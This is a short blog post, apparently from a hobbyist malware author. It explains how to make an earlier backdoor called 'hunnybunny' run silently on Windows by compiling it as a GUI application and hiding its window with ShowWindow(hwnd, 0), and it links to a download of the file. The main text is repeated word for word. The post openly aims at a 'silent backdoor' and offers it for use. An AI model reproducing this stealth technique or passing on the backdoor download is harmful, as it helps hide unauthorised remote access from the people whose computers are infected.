If u follow my post previously, if you run hunnybunny even when using shortcut it will create something like this.
A command prompt... We don`t actually like command prompt since it defeat the purpose of silent backdoor.
In Linux we can easily background a process simply by issuing command & . But in Windows nah no such thing.
How can we background a backdoor process in this case?
Simple, by treating our console application as a windows application!!!
So we include the nesccary windows header file to build a gui apps
Declare the procedure and set
/** mark the windows invisible **/
ShowWindow (hwnd, 0);
Smack our original code in main function and we are good to go.
Download: http://www.sendspace.com/file/by8b01
A command prompt... We don`t actually like command prompt since it defeat the purpose of silent backdoor.
In Linux we can easily background a process simply by issuing command & . But in Windows nah no such thing.
How can we background a backdoor process in this case?
Simple, by treating our console application as a windows application!!!
So we include the nesccary windows header file to build a gui apps
Declare the procedure and set
/** mark the windows invisible **/
ShowWindow (hwnd, 0);
Smack our original code in main function and we are good to go.
Download: http://www.sendspace.com/file/by8b01
No comments:
Post a Comment